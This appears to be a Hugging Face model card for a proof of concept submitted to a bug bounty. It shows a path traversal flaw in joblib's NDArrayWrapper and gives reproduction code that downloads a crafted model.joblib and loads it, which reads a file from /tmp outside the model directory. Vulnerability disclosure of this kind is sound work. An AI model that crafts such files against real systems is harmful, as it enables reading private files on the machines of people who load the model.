Security Research β€” Joblib Path Traversal PoC

This model is for authorized security research only (huntr.com MFV submission).

This demonstrates CVE: Path Traversal via NDArrayWrapper in joblib.load().

Vulnerability

joblib/numpy_pickle_compat.py:99 β€” os.path.join(dirname, self.filename) discards the base directory when self.filename is an absolute path, allowing arbitrary file reads.

Reproduction

# Step 1: Create a test file at the traversal target
import numpy as np
np.save('/tmp/huntr_poc_data.npy', np.array([1.0, 2.0, 3.0]))

# Step 2: Download and load the model
from huggingface_hub import hf_hub_download
import joblib

path = hf_hub_download(repo_id="bassia/joblib-path-traversal-poc", filename="model.joblib")
result = joblib.load(path)
print("Data read via path traversal:", result)
# Output: [1. 2. 3.] β€” read from /tmp/, NOT from the model directory!
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support